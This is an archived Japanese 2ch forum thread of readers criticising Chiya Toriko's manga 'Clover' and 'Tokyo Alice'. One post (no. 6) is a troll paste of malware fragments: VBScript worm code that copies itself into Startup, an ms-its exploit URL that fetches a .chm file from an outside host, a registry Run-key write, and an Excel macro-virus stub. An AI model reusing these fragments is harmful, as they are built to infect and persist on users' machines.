5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【クローバー】稚野鳥子 Part9【東京アリス】

1 :花と名無しさん:2006/10/30(月) 16:28:48 ID:???0
KISSで東京アリス連載中、またコーラスでクローバー連載再開
稚野鳥子の作品について語るスレです。
関連スレについては>>2を参照。

前スレ 【クローバー】稚野鳥子スレッド Part8【天国の花】
http://comic6.2ch.net/test/read.cgi/gcomic/1104926661/

2 :花と名無しさん:2006/10/30(月) 16:30:46 ID:???0

::::::クローバー::::::
http://mentai.2ch.net/gcomic/kako/962/962375949.html
++稚野鳥子++
http://piza.2ch.net/gcomic/kako/974/974865854.html
★★稚野鳥子★★
http://choco.2ch.net/gcomic/kako/1001/10014/1001434861.html
クローバー
http://comic.2ch.net/gcomic/kako/1007/10079/1007981570.html
稚野鳥子作『天国の花』
http://comic.2ch.net/gcomic/kako/1011/10113/1011354662.html
◆◇≪ ク ロ ー バ ー≫を語ろう◇◆
http://comic.2ch.net/gcomic/kako/1016/10166/1016614573.html
⊂稚野鳥子スレッド⊃
http://comic6.2ch.net/test/read.cgi/gcomic/1051775635/

3 :花と名無しさん:2006/10/30(月) 16:52:13 ID:???O
余裕で3ゲト!

4 :花と名無しさん:2006/10/30(月) 17:54:18 ID:???O
●関連スレッド&サイト

【ヒロインほぼ全員】 Kiss 21 【ダメ女】
http://comic6.2ch.net/test/read.cgi/gcomic/1158669200/

◆◇コーラス その27◆◇
http://comic6.2ch.net/test/read.cgi/gcomic/1161234323/

・Kiss公式
http://www.kisscomic.com/
・コーラス公式
http://chorus.shueisha.co.jp/

5 :花と名無しさん:2006/10/30(月) 18:59:07 ID:Swd2EyyzO
りりかと村岡さんを忘れ、新キャラ投入した作者。 ひどすぎ

6 :<body onload=window()>:2006/10/30(月) 20:40:45 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


7 :花と名無しさん:2006/10/30(月) 21:03:48 ID:???0
('A`)

8 :花と名無しさん :2006/10/30(月) 22:09:59 ID:ZTFMbTrB0
あゆこって今柘植さんの弟と付き合ってるの?

9 :花と名無しさん:2006/10/31(火) 03:10:59 ID:???0
うん、中田氏男とね・・・

10 :花と名無しさん:2006/10/31(火) 10:00:00 ID:???0
みんなどんどん妊娠していくね。
漫画と同じで考えナシの登場人物ばかりか。
サイアク。

11 :花と名無しさん:2006/10/31(火) 10:10:10 ID:???0
作者が他に展開思いつかんからでしょ。
この手のダラダラした恋愛マンガには惚れたはれた、くっついた別れた、を一通りやったら
後は妊娠か結婚かレイプしか残ってないw

12 :花と名無しさん:2006/10/31(火) 13:16:20 ID:???0
そういやりりかの妊娠はどうなったんだよー
作中ではもう出産しててもおかしくない時期になってるんじゃない?
いきなり中絶とか流産とか、セリフだけで説明されそうな予感。

13 :花と名無しさん:2006/10/31(火) 13:45:20 ID:x+joq2fPO
柘植母も子供産んだし、おばあちゃん(双子みたいな)も片方亡くなったんだね。
かなり重大なことをセリフ一行で…
柘植兄と看護婦はどうなったんだ…

14 :花と名無しさん:2006/10/31(火) 15:20:57 ID:???0
妊娠結婚レイプの他にも事故病気自殺他殺もあるよ。
自殺他殺は心理描写がかなり面倒になってくるから
この手のマンガではせいぜい事故病気止まりだろうけど。

15 :花と名無しさん:2006/10/31(火) 21:50:21 ID:???0
柘植弟の前編はしか読んでないんだけど
>>8見ると後編でいきなりあゆことくっついたって事?
あの娘は捨てられたのかぁ。
何だか展開がめちゃくちゃだなぁ。
結構好きなマンガだからまだ読んでるけど
最近流れが強引過ぎてついてゆけないー。


16 :花と名無しさん:2006/10/31(火) 22:02:25 ID:???0
前回(といっても1年ほど前だけど)の話の終わり方からすると、
りりかと村岡さんはダメになったってことだよね。
ジュニアとりりかを鉢合わせた意味は今後あるのかな。




17 :花と名無しさん:2006/10/31(火) 22:17:40 ID:???0
捨てられたっつうか、妊娠したお腹の子供は元彼の子で
モトサヤに戻っただけで、柘植弟から捨てたわけじゃなかったよ。
まぁ最初から逃げ腰だったけど。

18 :花と名無しさん:2006/10/31(火) 22:19:20 ID:???O
作者の柘植贔屓は何とかならないのかな。
最初は良かったけど今は柘植が一番大嫌い。

まさかこんなにダラダラした展開を引きずるとは思ってなかったよ。
さやは大人としても女としても魅力が全く無い。
柘植絡みの女が出てくる定番の展開になればバカみたいに悶々するだけだし。

5年も交際してるのに遠慮して男に対して少しでも強く出る根性がないなら先に未来は無いね。

柘植は会社人間だからジュニア姉に対してもイイ面ばかりするだろうな。
出世欲ある野心家だし。

19 :花と名無しさん:2006/10/31(火) 22:36:44 ID:???O
>>17は優しいな。
中田氏しまくっといて妊娠した→
今3か月だから元カレの子だ→
あゆことメデタシメデタシ

妊娠した子は元カレにも捨てられるに決まってるじゃん。
あんな一人不幸せ状態放置したままエンドなんて酷すぎる。
しかも妊娠3か月なんてやってから1か月位なんだよ。
妊娠してから3か月じゃないんだからね。
翠の子である可能性だってないとは言い切れないぞ。

20 :花と名無しさん:2006/11/01(水) 00:49:38 ID:???O
>>19
作者の脳内では妊娠3ヶ月→3ヶ月前のセックスで出来た子
なんでしょう

サヤと柘植さんでいくら喧嘩したり気まずくなっても、いつも高級ブランドのプレゼントかセックスで持ち直すよね

21 :花と名無しさん:2006/11/01(水) 01:45:05 ID:???O
なんかバカ漫画の真骨頂?
今回はつげ目線なのか、モノローグで言うこと偉そうだし、さやはさやで「ヤング島」とかにこだわるのが中身ぺらぺら腰掛けOLぽいし(ちなみに連載始まった頃まだ学生だった私、ババァ島の曾長レベルの歳デス)ぺらぺらバカ漫画にしか見えないんだけど…
どーせまた社長令嬢とつげの政略結婚話が出ると…さや悶々。しかし甘い言葉で復活…。
コーラスで終わるのか!?また別の雑誌に飛ばされる前に終わって欲しいデス…(涙)

22 :花と名無しさん:2006/11/01(水) 03:04:14 ID:???O
マトモなカップルがいないのが問題だよ。

柘植弟だって結局は狙ってたあゆこと即席ラーメンみたいに簡単にデキ上がっちゃってるし。
全然面白くないのは柘植の血縁者ばかりがやたらといい思いをする展開。
たまには柘植やさやにも苦しんで欲しいよ。

メイン二人に比べていつも脇役ばかりが深刻に苦しむばかりでつまらない。
りりかの方がよっぽどリアルに苦悩してて共感する。
個人的には柘植に比べたら村岡の方がまだイイ男に思えるよ。
妊娠後の対応は別としても形式にとらわれない生き方をしているだけ愛はあるだろうし。
柘植には愛人連れて海外赴任する根性は無いよ。
体裁を取り繕うのが何より先で、愛とか精神面なんて後付けなタイプだし。

柘植だけはお仕事ロボットみたいで好きになれない。

23 :花と名無しさん:2006/11/01(水) 12:14:06 ID:???0
あゆこ&先生カップル好きだったのに。
翠くんも昔は良かったのに。
中田氏DQN男にされてしまって(´・ω・`)
あゆこだってそんな男でいいのか?
中田氏妊娠逃亡男なんて最低だぞ。結果的に自分の子じゃないとはいえ

24 :花と名無しさん:2006/11/01(水) 17:28:56 ID:???O
りりかは今どこにいるの?アラスカ?
帰ってきてなかった?

25 :花と名無しさん:2006/11/01(水) 19:17:30 ID:???0
>中田氏妊娠逃亡男

山田孝之みたい・・・

26 :花と名無しさん:2006/11/01(水) 19:41:36 ID:???O
兄弟と姉妹でくっつくなんていやらしいって
週末婚で松下由紀が永作に言ってた

27 :花と名無しさん:2006/11/01(水) 21:29:40 ID:???0
どうせ柘植さんが浮気して
双子の片割れがまた出てきて
ひと悶着するんでしょ。
で結局柘植さんとゴールイン
みたいな結果になりそうだ・・・。

28 :花と名無しさん:2006/11/01(水) 21:34:47 ID:???0
>>27
もうそれでいいからこれ以上よけいなキャラなんか出さずに
早いとこサクッと終わらせてくれ

29 :花と名無しさん:2006/11/01(水) 22:57:54 ID:???O
age

30 :花と名無しさん:2006/11/01(水) 23:07:54 ID:???O
26でババア扱いの会社なんて今時あるのか
しかも大手

31 :花と名無しさん:2006/11/01(水) 23:19:00 ID:???0
柘植さんよりハルキのほうが好きなんだけどな。
沙耶なんかにはもったいないから、沙耶は柘植と結婚してくれ。
ハルキは沙耶よりもずっといい女と幸せになってほしい。

32 :花と名無しさん:2006/11/01(水) 23:45:28 ID:???O
りりかは沙耶の双子の弟とよりを戻しそうな予感がする。 


33 :花と名無しさん:2006/11/02(木) 00:41:48 ID:???0
どっかのサイトの漫画評でクローバーとりあげてて、
柘植さんがサヤにカルティエの指輪渡すシーン等をさして、
男尊女卑の経済観念、若さ・金・地位マンセーを全く誰も疑っていないスバラシイ世界感。
唯一主人公が疑うのは、相手の男の心だけ、しかも毎回誤解ですむというサムイ展開…。

とあって、笑った。
りりかが、お見合い相手の男性がやさしいけど顔は嫌い、と席を立つシーンで
男女逆だったらこの世界ではこてんぱんのはずなのに…。とも。

34 :花と名無しさん:2006/11/02(木) 02:57:34 ID:???O
>>33
あっその書評読んだことある
ネットで広告代理店みたいなのしてるとこだよね?
CanCamのえびちゃんシアターについても面白い書評が載ってた

35 :花と名無しさん:2006/11/02(木) 09:14:58 ID:kHk/pg7JO
秘書課って別の課で何年か修業してからでないとはいれないって書いてあったのに
今回「ヤング島」では21歳が何人かいてあれっ?と思った
あの会社高卒はとらないだろうし
しかしキャリアウーマンっぽいカズヨが25歳かそこらで結婚したり
りりかに27歳の妹尾さんを「年だからもてない」と言わせたり
厳しいですな…

36 :花と名無しさん:2006/11/02(木) 10:18:53 ID:???O
お祝い金精算話にモニョった〜
同期全員って義務じゃあるまいし。
仲悪い、話したこともないヤシもいるだろ?
しかも二万って…20代前半は2万しか包まなかったが
20代後半からは3万がデフォダタヨ

あれは独女にナイスアイデア!と流行らそうとしてるエピなのか?

37 :花と名無しさん:2006/11/02(木) 12:34:11 ID:???O
初期は25才で今旅館の女将をしてる人が課の女性最年長だったり、27の妹尾さんの同期女性が一人しかいなかったりだったけど
沙耶達は相変わらず会社にいて辞める様子もないから少しは違うんじゃない?
りりかはパン屋でバイトでもしてるんだろうか?

38 :花と名無しさん:2006/11/02(木) 14:19:18 ID:???O
年齢や社内環境とか、つじつまが合わない設定が多いだけに読むたび薄い内容だなと思ってしまう。

もしも本編に出て来なくなったりりかが子供堕ろして生活してますよ、なんて話になったら最悪。
いくら漫画でもそんな風に子供を軽はずみに使われたら許せないな。
一人でも守るくらいの強さがなければ共感しないし、軽率な行動で子供を犠牲にしたらただの最低人間だと思う。
子供を堕ろして他の男と幸せになるなんて都合良く進む話にならない事を祈るしかない。
子供堕ろしても幸せに生きるりりかに共感してよ、的な意図が作者にあるならそれは間違ってる。

男尊女卑、まさにその通りだよ。
さやは柘植を影に隠れて自己主張はないし、柘植は都合が悪くなったり手懐ける為には馬鹿らしいくらいなブランド品を買い与えるし。
更に信じられないのはさやがそれを毎回喜んで受け取ってるところだね。

さやってどこまでバカなんだろ。
物に釣られて踊らされている時点で純粋とか天然だとは思えない。


39 :花と名無しさん:2006/11/02(木) 14:55:53 ID:???O
作者自身がモノに釣られて喜ぶ
女は若さだと思ってるタイプなんでしょ?
でも作者って四十代だよね
こんな内容かいててつらくないのかなあ…
やたら不倫を肯定してるし…

40 :花と名無しさん:2006/11/02(木) 18:41:50 ID:???O
理由もなくプレゼントをあげる男のどこが良い男なんだろう。
たかがブランドの指輪貰っただけで浮かれて騒ぐ女も馬鹿らしいけど、作者は読者がブランド品貰って能天気に喜ぶ女に共感すると思ってるのかな。

前から読んでて思ったんだけど柘植って何気に女を目下に見てる印象強くて嫌な感じ。
ゆうちゃんの弟妹に好かれる努力をしてる滝沢の方がまだいい。


41 :花と名無しさん:2006/11/02(木) 19:21:07 ID:???O
ホテル業界って女性の比率高そうなのになぁ…。
現場の人間や業界ならではのこともほとんどでないし、
なぜ業界を限定したんだろう…?
働いてることなんてエッセンス程度の扱いなのに。

42 :花と名無しさん:2006/11/02(木) 20:01:51 ID:???O
作者が実際にホテル業界出身であり
さらに高いホテルに泊まった時取材費でおとすから
だと思う

43 :花と名無しさん:2006/11/03(金) 07:30:19 ID:???O
ハワイもハワイ旅行や懐かしいバケットが経費で落ちたのね

絵柄といい話といい、どんどんモサンチックな感じになっていってしまっているのに危機感を覚える

ぶ〜け連載時には雲泥の差があったように感じた、モサヨ先生の域まであと一歩

このスレもネタスレになるギリギリのところ

44 :花と名無しさん:2006/11/03(金) 13:59:50 ID:???O
モサヨの主人公のが仕事してます

45 :花と名無しさん:2006/11/04(土) 05:32:26 ID:???O
>>44
orz
あれも仕事かよ!って話だけど、それ以下だから

46 :花と名無しさん:2006/11/04(土) 15:41:28 ID:???0
ははは
確かにモサマンの主人公の方が仕事してるし
恋愛に関しても行動してるし、更に笑える分マシだな。
しかもモサの方がチヤトリより100倍仕事してる。何もかもモサ以下だ。モサイカ。

47 :花と名無しさん:2006/11/04(土) 22:31:49 ID:???0
モサとチヤトリどっちが年上なの?

48 :花と名無しさん:2006/11/05(日) 06:47:04 ID:???O
チヤトリは43歳くらいだよね?
モサは40前後かな、ちょいモサが若いかも

49 :花と名無しさん:2006/11/05(日) 15:58:31 ID:???O
モサとチヤトリどっちが先に会社ラブもの(?)描き始めたの?

50 :花と名無しさん:2006/11/05(日) 16:08:12 ID:???O
モサかなりお年だよ。デビューが昭和50年代なんだから。
コーラスの中でもベテラン度は
御大、田淵、くらもちの次位じゃね?

51 :花と名無しさん:2006/11/06(月) 12:10:09 ID:???0
ほぼ同年齢?

---------------------------------

54 名前:花と名無しさん[sage] 投稿日:03/03/24 00:55 ID:???
いくえみ綾 
紡木たく 
宮川匡代 ともに64年生まれ
宮川だけ早生まれで学年は1つ上

52 :花と名無しさん:2006/11/06(月) 14:48:55 ID:???O
モサヨはいつまでも若々しい漫画描くねw

53 :花と名無しさん:2006/11/06(月) 14:52:09 ID:???O
モサヨ42歳かあ
モサヨは確かすごいデビュー早かったよね
15か16くらい?

54 :花と名無しさん:2006/11/06(月) 20:27:00 ID:kMn0kaFb0
りりかは結局子供どうした?
さやよりはるかにりりかの話のが
きになるよ。

55 :花と名無しさん:2006/11/06(月) 21:35:25 ID:???0
ハゲド。結局、沙耶弟とくっついてる気がしてならん・・・
そのうち二人で出てきて、セリフで説明だったりして。

56 :花と名無しさん:2006/11/06(月) 22:43:25 ID:???O
セリフ説明オチでしょ>リリカ
今までもかなり重要な展開をすっとばしてたからね…
カズヨが合田さんと別れたのもセリフだけだったし。
しかし沙耶26かあ。プロポーズされて沙耶のきびし〜い親父の許可をもらってから
2年も婚約期間なんだね。長いな。

57 :花と名無しさん:2006/11/07(火) 01:51:31 ID:???0
柘植さんが最初28歳だったのにね。
どんだけ長い付き合いなんだ

58 :花と名無しさん:2006/11/07(火) 08:12:17 ID:???O
沙耶21柘植28から付き合って
今、沙耶26柘植33か。
初期の頃「うちの会社は30すぎて独身だと出世にひびく」ってセリフあったけど
とっくに過ぎてるけどいいのか?

59 :花と名無しさん:2006/11/07(火) 16:43:38 ID:???0
出世の鬼柘植が栞と結婚して
沙耶が捨てられたら面白いのにな〜。この人を見直す。

60 :花と名無しさん:2006/11/08(水) 13:12:20 ID:???0
>>59
そしてハルキエンドww

61 :花と名無しさん:2006/11/08(水) 21:04:19 ID:???O
栞が絡むとなると従姉妹の妹尾さんはまた出てくるかな?
絡むとおもしろくなりそうだけど、アメリカで結婚しましたの一言説明だったらつまらん。

62 :花と名無しさん:2006/11/08(水) 21:09:40 ID:???0
早くモサくらいふっきれてくれりゃいいのに。
このままじゃ全然笑えないしおもしろくもないぜ

63 :花と名無しさん:2006/11/09(木) 12:26:08 ID:???O
沙耶が捨てられても実家金持ちだし、
ハルキがいるしたいして不幸にはならないからツマンネ

64 :花と名無しさん:2006/11/09(木) 17:27:26 ID:???O
りりかは大変だね。
あの様子じゃ実家に帰れそうもないし職もないし。
沙耶の家か元彼のマンションにでも住んでるのかね?金は村岡が送ってくるとして

65 :花と名無しさん:2006/11/09(木) 22:25:33 ID:???0
実際柘植さんタイプの男性って職場でモテるの?
女性のこと内心バカにしてそうなとこが嫌だ・・・

66 :花と名無しさん:2006/11/09(木) 22:27:28 ID:???0
脳みそバブルなDQN女にはモテるんじゃない。金の亡者とか。

67 :花と名無しさん:2006/11/09(木) 22:29:33 ID:???0
ぶ〜けをつまらなくした戦犯

68 :花と名無しさん:2006/11/09(木) 22:59:53 ID:???O
ぶ〜けの時はまだよかったよ
団地階段会談とか

69 :花と名無しさん:2006/11/09(木) 23:09:38 ID:???0
沙耶は出来婚しそうでしないなw柘植は避妊してるのか?
柘植は沙耶と交際してから浮気は何回したの?
恋愛と結婚は別物て思ってそうww

70 :花と名無しさん:2006/11/10(金) 00:05:58 ID:???0
浮気のシーンは作中にないけど
陰でこっそりしてそうな男ではあるね>柘植
俺はいいけど、彼女が傷つくからしないとか抜かしてたっけ。

71 :花と名無し:2006/11/11(土) 17:08:30 ID:???0
東京アリスの1巻買いました。面白いと思って今日
本屋でkissの最新号立ち読みしてきたら1巻と最新号の
話がつながってなくてがっかり。ご親切な方、間の話を
教えてくださいませんか?

72 :花と名無しさん:2006/11/11(土) 23:14:52 ID:???0
円城寺に奥薗さんを紹介したんだけど、
円城寺は「最高のセックスマイスターを探してる」ような女だから
当然他に彼氏がいたわけ。
で、奥薗さんのことが気になりだしてるふうが
「奥薗さんに失礼だよ」とかなんとか言ったら、
紹介したのはあんたでしょと円城寺に逆ギレされたの。
ふうも別に奥薗さんは自分の彼氏じゃないし、そう言われたら
何もいえなくなっちゃって。
そうこうしてるうちに、大阪に出張に行くことになったふう。
最初は渋谷も行く予定だったが、ギックリ腰で急遽キャンセルで
奥薗さんと2人でいくことに。

ごめん、本誌買って読んでるわけではないのでうろ覚えで
かなり省略してます。
でもこんなかんじです。

73 :71:2006/11/11(土) 23:56:19 ID:???0
>>72さん
今月号でふうが奥園さんは円城寺の
彼氏なんだし...って考えてる場面が
気になってたんです。よかった!
丁寧に教えて下さってありがとうございました。



74 :花と名無しさん:2006/11/13(月) 07:18:37 ID:tyX5L3vAO
コミック派だから本誌どうなってるか分かんないけど17巻見るかぎりリリカ子供中絶してそう。

75 :花と名無しさん:2006/11/13(月) 08:48:00 ID:???0
東京アリス1年たってもまだ
話進展してない。。しかも毎回24Pぐらいしかないから
いらいらするね、次回は2ヶ月以上も先立って!
なめてるとしか思えん

76 :花と名無しさん:2006/11/13(月) 09:29:44 ID:???O
楽しみにしてるんですね
24Pどころか1Pもいりません

77 :花と名無しさん:2006/11/13(月) 09:53:42 ID:???0
クローバー今どうなってる?
本誌読んでないから分からない・・・

78 :花と名無しさん:2006/11/13(月) 14:04:50 ID:???0
どうもなってないんじゃない?
本誌読んでないけどスレ見てると特に進んでないっぽい。

79 :花と名無しさん:2006/11/13(月) 14:29:11 ID:???0
柘植さんに新たな女が出てきただけ。
バツイチ社長令嬢。弟の専務が、姉と柘植とくっつけようとしてて
沙耶ピンチ!?こんな感じ。

80 :花と名無しさん:2006/11/13(月) 14:48:40 ID:9Dq08StSO
柘植がとっとと沙耶との交際を会社にオープンにすりゃいーんだよね。
お父さんに挨拶に行ったのが沙耶24歳の夏か?ノースリ着てたし。
その次に沙耶が柘植実家に花嫁修行したのが25歳になる誕生日付近の9月くらい。
そんでもう沙耶26歳で式の日取りも決まってないってダラダラしすぎだろう。
いくら義母の高齢出産に伯母の不幸があったとしたって、日取りくらい決めてオープンにすべきだ。
しないから会社だって縁談を持ってきたりするんだろう。

81 :花と名無しさん:2006/11/13(月) 20:59:34 ID:???O
ほんとウザイよ、この漫画。
自分の都合だけで彼女の婚期を遅らせ、女を小ばかにしてる男と、バブルのように使われる金に踊らされ幸せボケしてる、働けないダメOL?の話なんて、もう時代後れもいいとこだよね。
こんな漫画さっさと終わればいいのに…と思いつつ、コミックス買ってた頃の流れで立ち読みしてしまいマス…。まだ若かったからね、自分も。
はぁ…。早く終われ〜!

82 :花と名無しさん:2006/11/14(火) 03:12:13 ID:???O
ハルキエンドで10巻くらいにまとめてれば、ちやさんもメンヘルになってなくて、わりに佳作を描いてたんじゃない?

83 :花と名無しさん:2006/11/14(火) 06:37:10 ID:???O
東京アリスの柱コメントが痛かった。
プラダを着た悪魔を見に行く、ブランドたくさん出るのが楽しみだってさ。
この人頭の中それしかなさそう。

84 :花と名無しさん:2006/11/14(火) 08:04:39 ID:???0
チヤトリ見てると
何故かモサへの好感度がどんどん上がっていくわw

85 :花と名無しさん:2006/11/14(火) 08:33:23 ID:???0
>83
だって、東京アリス書こうと思ったのが
担当さんがお買い物好きで
自分とお買い物の話題で盛り上がったから
その話に決めようと思ったらしいよ・・・
ほんと、買い物にしか脳ない感じ。
話変わるけど、チヤトリってオークに何か出してんのかな?
東京アリスにその話出てきたから。


86 :花と名無しさん:2006/11/14(火) 08:37:27 ID:???O
モサは洋服のブランドにはあんまり興味なさそうだよね。
アメリカかぶれの横文字かぶれ(笑)ではあるんだけど。
モサのは笑ってすませられるがチヤトリのはバブリーでやなかんじ。
ブランドだったらなんでもよさそう。

87 :花と名無しさん:2006/11/14(火) 08:43:41 ID:???0
確かに・・・
その中でもシャネルみたいな?
でも、ブランド持ってるから何になるのかよく分からん。
もちろん自分が気に入ったデザインや形だったら良いんだけど
ブランドただ持ってますみたいな人は
理解し難い。
これだから日本人はブランド好きで外国から馬鹿にされてんのよね。


88 :花と名無しさん:2006/11/14(火) 10:49:39 ID:???O
ふうのCHANELのカンボンラインがまったく素敵に見えない…ぐぐったけど。
カバンさえ持ってりゃいいってもんじゃないと思う。

89 :花と名無しさん:2006/11/14(火) 12:14:34 ID:???0
カバンというか
絵自体が崩れてきてる・・・
なんかバランスとれてなくて変になってる


90 :花と名無しさん:2006/11/14(火) 22:17:17 ID:???O
東京アリス絵も主人公可愛いし、なんで不評なのかわからない
漫画なんだからそんなに真面目に考えなくても面白かったらいいと思いますが

91 :花と名無しさん:2006/11/14(火) 22:48:45 ID:???0
絵は崩れてきてる。確実に。
クローバー読んだ事ある人なら分かるはず。
東京アリス面白いと思えるところがすごい・・・
自分がただ買い物の話書きたいだけで
ただの自己満足の作品を読者はおもしろいとは思えない。
しかも、内容がクローバーと変わらない。
こんなつまらない作品はないです。


92 :花と名無しさん:2006/11/15(水) 02:48:23 ID:???O
絵かなり崩れてます。正直、チヤトリの絵は可愛いと言えない。クローバーはいつの間にか恋愛から嬉々として流行りブランドに飛びつくキツイOLの話になりつつありますね。

93 :花と名無しさん:2006/11/15(水) 09:11:23 ID:???0
自分の洋服代経費で落とすために描いてる漫画>東京アリス
面白いと思うのも自由だが、腹が立って当然かと。
しかもみんなが待ってる方のクローバーがgdgdだから、余計に。

94 :花と名無しさん:2006/11/15(水) 11:52:35 ID:???0
>自分の洋服代経費で落とすために描いてる漫画

これって血屋鳥本人がやってることなんだろうね
単行本でサヤが着ている服を読者プレしてたこと思い出した

95 :花と名無しさん:2006/11/15(水) 14:10:21 ID:???O
サヤが着てる服になんか正直言って全く憧れない。
ブランドかぶれのOLには興味ないし。

96 :花と名無しさん:2006/11/15(水) 15:40:31 ID:???0
>93
その通り☆
1つの作品をちゃんと描きおわってから
次に行ってって感じ。
クローバーもまともに終わってない中
東京アリスを始めたことがまるで分かりませんね。



97 :花と名無しさん:2006/11/15(水) 18:04:04 ID:???0
>正直、チヤトリの絵は可愛いと言えない。
確かに。昔のサヤは丸顔で可愛かったのに。
今の絵だとどのキャラもほほがこけすぎて、どこの癌患者かと思う。

98 :花と名無しさん:2006/11/15(水) 21:45:29 ID:???0
いいたいことはわかるけどその表現の仕方は癌患者さんたちに失礼では・・・

99 :花と名無しさん:2006/11/16(木) 04:24:57 ID:???0
ガイシュツですが、主人公ダッチワイフにしか見えません。
口ポカーんすぎ。

100 :花と名無しさん:2006/11/16(木) 09:07:23 ID:???0
以前、クローバー休載中に「構想2年!!!」て大々的にクッキーに載った話、
多分ガーデンプレイスが舞台のクソつまんない話でポカーンだったんだけど、
知人がチヤトリ自体もガーデンプレイスに住んでいて、家賃を経費にするために
その漫画書いたんだって言ってた。
ものすごい、頭にきたよ。

101 :花と名無しさん:2006/11/16(木) 12:47:17 ID:???0
そんなの経費で落とせるんだあ〜
国税局も案外甘いね

102 :花と名無しさん:2006/11/16(木) 13:23:44 ID:???O
実際チヤトリってキレイなのかなあ

103 :花と名無しさん:2006/11/16(木) 13:50:05 ID:???0
>>100
住居としても使用してるなら全額経費扱いは無理でしょ。
その部屋で漫画描いてるんなら、別に漫画のネタになってなくても
仕事場扱いで家賃の何割かは経費で落せるだろうけど、逆に
漫画に描こうがどうしようが、家賃のうち経費で落せる割合は
変わらないんでないの?

「漫画の舞台に使った。だから家賃も全額経費で」を貫くには
題材にした原稿上がり次第退去くらいしないと通らないんでは。

104 :花と名無しさん:2006/11/16(木) 14:46:08 ID:???O
住まいは代官山って噂で聞いたけど
奥園はガーデンプレイスに住んでそうだね。
この人って東京出身?
おしゃれに描いてるけど田舎っぽいんだよな…

105 :花と名無しさん:2006/11/16(木) 14:47:07 ID:???0
ストーリーも田舎臭いしねー。

106 :花と名無しさん:2006/11/16(木) 15:10:36 ID:???0
>>104
地方から出てきた子がブランド物がいっぱいな東京に夢中!
って感じにも見えるね。なんか必死でがっついてる。

107 :花と名無しさん:2006/11/16(木) 16:07:04 ID:iA5qjJYeO
>>106
そーいう感じ!的確な表現だなあ。
この人40すぎでしょ?
それくらいになれば東京!おしゃれ!みたいな漫画をかかなくなるような気がするんだけど
この人の場合年々ブランドや都会ムード(笑)が増していくんだよね…
西村しのぶなんかもブランド大好きのおしゃれマンガ家なんだけど
なんかチヤトリのは痛いのね…
西村しのぶは大人っぽい上質感があるけど
チヤトリのは幼いブランド好き(無節操)な感じだからかな。

108 :花と名無しさん:2006/11/16(木) 16:10:01 ID:???0
そこが田舎の子には受けている、だから売れてるんだとおもうなあ。

109 :花と名無しさん:2006/11/16(木) 17:16:34 ID:???O
泉ピン子と同じ。
ブランド名だけをありがたがってる感じ。
ブランド品のお手入れとか全然せずにただ流行ってるものを買い散らしている予感。

〜の指輪!
〜の時計!
〜のバッグ!

ほんと田舎もんなんだよな〜。
ポリシーが感じられない。
何年後に読み返して古さが目に付きそう。

ほんとに面白い漫画って何年たってもその辺が気にならずに読めるけど
チヤトリのはあきらかに劣化しそう

110 :花と名無しさん:2006/11/16(木) 17:19:33 ID:???O
オークションに詳しかったし
チヤトリは金に任せて流行のブランドを買っては
ヤフオクに出しているんだと思う…
ヤフオクに出すってとこがまた偽セレブ…

111 :花と名無しさん:2006/11/16(木) 17:38:12 ID:???0
金に任せてというなら、むしろ欲しいものを
オークションで競り落としてるイメージ。

112 :花と名無しさん:2006/11/16(木) 20:41:54 ID:???O
オークションで買ってもいるし売ってもいそう。
飽きっぽい感じするから、飽きたら売る〜みたいな。
飼っている犬がプードルってもわかりやすい…ファッションなんだろうなあ。

113 :花と名無しさん:2006/11/17(金) 08:31:05 ID:???O
チヤトリは六本木ヒルズにも住みたいはずだ

114 :花と名無しさん:2006/11/17(金) 09:07:00 ID:???0
まゆたんスレに迷い込んだのかと思った

115 :花と名無しさん:2006/11/17(金) 20:58:50 ID:???O
今月のコーラスで初めて読んだけど、なんじゃアリャ
本屋さんの棚を見てびっくりしたよ。
クローバーって面白いのか?
来月号立ち読みで済まそうかな

116 :花と名無しさん:2006/11/18(土) 13:43:25 ID:???O
クローバーはどうなってんの?打ち切り?

117 :花と名無しさん:2006/11/18(土) 18:02:12 ID:???0
今、コーラスでやってるよ!
ハチクロとかぶるからか、
英語になって再登場〜・・・


118 :花と名無しさん:2006/11/18(土) 21:26:38 ID:???O
>>117
再開してたんだ。早速明日本屋行ってくる。ありがとう!

119 :花と名無しさん:2006/11/19(日) 11:33:27 ID:???0
読んだら感想よろしく〜

120 :花と名無しさん:2006/11/21(火) 09:51:40 ID:pQi9D+AxO
やっとそろそろ終わるのかと思いきやまためんどくさい展開・・・そんなにグダグタ長く続けたいのだろうか・・・

121 :花と名無しさん:2006/11/21(火) 11:47:00 ID:???0
ロングラン狙ってるんだよ。
花より男子みたいな。


122 :花と名無しさん:2006/11/27(月) 21:26:25 ID:???0
柘植しゃん 顔が長くなったのね・・・


柘植しゃんスキだったけど
なんかうじうじしてきたな。ナンダコレ。
ぐだぐだ感満載。

123 :花と名無しさん:2006/11/28(火) 18:13:33 ID:???O
あのままヤッちまう
やろうとするけどサヤに会って考え直す
ヤル直前に女が退く
次回初っ端に「冗談よ」で終わり

さぁどれ!

124 :花と名無しさん:2006/11/28(火) 20:22:29 ID:???O
あれがいわゆる「コーラス」向けの大人の展開か?
柘植ってあんな性格か?
またサヤのお料理教室通いがベタな花嫁修業感まるだしだし…。
